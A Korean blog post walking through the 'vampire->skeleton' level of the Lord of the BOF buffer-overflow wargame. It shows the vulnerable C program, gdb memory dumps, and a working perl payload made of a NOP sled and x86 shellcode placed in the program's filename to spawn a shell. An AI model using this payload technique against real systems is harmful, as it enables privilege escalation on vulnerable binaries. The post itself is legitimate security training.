옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ my-pass

쉘코드는 지난번에 사용한 2f없는것도 왠일로 안먹길래,, 그리고 ~~2f들어가는거 심볼릭 링크로 하는거 배웠는데 손이랑 머리가 고자라 기억못해서~~ 삽질끝에 풀이에서 가져왔어요. 쉘코드 출처:http://john-data.tistory.com/187

풀이는 안봤어요 히힣ㅎ히히히히히히 보려고도 했으나 엄청나게 설명이 많아서 그냥 다 때려치고 학교프로젝트도 때려치고 이것만 때려잡으려는찰나에 히히힣ㅎ히히히히히

잡담은 그만하고 정리한 로그 보여드릴께요.

//bash 2, ./ssssssss는 복사본.

[vampire@localhost vampire]$ ls

skeleton skeleton.c

[vampire@localhost vampire]$ cat skeleton.c

The Lord of the BOF : The Fellowship of the BOF

- skeleton

- argv hunter

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i, saved_argc;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

// argc saver

saved_argc = argc;

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40); //버퍼 사라짐

// ultra argv hunter!

for(i=0; i<saved_argc; i++)

memset(argv[i], 0, strlen(argv[i])); //argv를 다 각각의 크기만큼을 0으로 덮어버림

}

argv error

stack is still your friend.

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfffffcd in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/./h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10s $esp

0xbffffa88: "?202\004\b?\034\002@뫄퓈?

0xbffffa97: "@[\205\017@4\227\004\b`?

0xbffffaa3: "@\004?옇?용\204\004\b \227\004\b4\227\004\b綿옹\t\003@\001"

0xbffffac2: ""

0xbffffac3: ""

(중략)

0xbffffbf3: ""

0xbffffbf4: "i686"

0xbffffbf9: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffc31: "LESSOPEN=|/usr/bin/lesspipe.sh %s"

(gdb)

0xbffffc53: "USERNAME="

0xbffffc5d: "HISTSIZE=1000"

0xbffffc6b: "HOSTNAME=localhost.localdomain"

0xbffffc8a: "LOGNAME=vampire"

0xbffffc9a: "REMOTEHOST=192.168.10.141"

0xbffffcb4: "MAIL=/var/spool/mail/vampire"

0xbffffcd1: "MACHTYPE=i386-redhat-linux-gnu"

0xbffffcf0: "TERM=xterm"

0xbffffcfb: "HOSTTYPE=i386"

0xbffffd09: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"

(gdb)

0xbffffd4c: "HOME=/home/vampire"

0xbffffd5f: "INPUTRC=/etc/inputrc"

0xbffffd74: "SHELL=/bin/bash"

0xbffffd84: "USER=vampire"

0xbffffd91: "BASH_ENV=/home/vampire/.bashrc"

0xbffffdb0: "DISPLAY=192.168.10.141:0.0"

0xbffffdcb: "LANG=en_US"

0xbffffdd6: "OSTYPE=linux-gnu"

0xbffffde7: "PWD=/home/vampire"

0xbffffdf9: "SHLVL=2"

(gdb) x/x 0xbfffffc4

0xbfffffc4: 0x6d6f682f

(gdb) x/10x 0xbfffffc4

0xbfffffc4: 0x6d6f682f 0x61762f65 0x7269706d 0x2f2e2f65

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968

(gdb) x/10x 0xbfffffc3

0xbfffffc3: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbfffffd3: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbfffffe3: 0x30690168 0x30696863

(gdb) x/10x 0xbfffffc1

0xbfffffc1: 0x2f003a35 0x656d6f68 0x6d61762f 0x65726970

0xbfffffd1: 0x682f2e2f 0x81cee28a 0x530cb168 0x6f6a6854

0xbfffffe1: 0x0168e48a 0x68633069

(gdb) q //여기서 앞에 nop를 안넣었다는 사실을 알아챔. 읽고 찾기 힘들어서 nop를 채웠습니다.

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ clear

[vampire@localhost vampire]$ rm rf *

rm: cannot remove `rf': No such file or directory

rm: j

X?Rh: is a directory

rm: remove write-protected file `skeleton'? y^Hn

rm: remove write-protected file `skeleton.c'? n

[vampire@localhost vampire]$ ls

j?X?Rh skeleton.c

[vampire@localhost vampire]$ ~~oh shit~~ //원본 프로그램 날림 이히히히히 권한이 사라졌따!

bash2: oh: command not found

[vampire@localhost vampire]$ gcc skeleton.c -o skeleton

bash2: ./????????????????????????????????????????h?須?h

SThjo??i0chi0tijY

Iy?投T? No such file or directory

[vampire@localhost vampire]$ cp skeleton ssssssss

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/????????????????????????????????????????h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x90909090 0x68909090 0x81cee28a 0x530cb168

0xbfffffdd: 0x6f6a6854 0x0168e48a 0x68633069 0x69743069

0xbfffffed: 0xfe59146a 0x79490c0c

(gdb) x/10x 0xbfffffd2

0xbfffffd2: 0x8a689090 0x6881cee2 0x54530cb1 0x8a6f6a68

0xbfffffe2: 0x690168e4 0x69686330 0x6a697430 0x0cfe5914

0xbffffff2: 0xfa79490c 0x54e1f741

(gdb) x/10x 0xbfffffd4

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968 0x59146a69 0x490c0cfe

0xbffffff4: 0xf741fa79 0x00c354e1

(gdb) q

The program is running. Exit anyway? (y or n) y

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ hell yes

sh: hell: command not found

bash$ exit

exit

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ my-pass

...

중간에 프로그램을 날린 관계로

키는 찾아서 하겠습니다...ㅋ

아 안그래도 요즘 정신적으로 너무 힘든데 그나마 힐링되네요 힐링♥︎

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

golem->darkknight (0)	2014.04.06
skeleton->golem (5)	2014.03.17
troll->vampire (0)	2013.12.22
orge->troll (0)	2013.12.21
darkelf->orge (0)	2013.11.22

EverTokki

vampire->skeleton

'STUDY > Lord of the BOF' 카테고리의 다른 글

+ Recent posts

티스토리툴바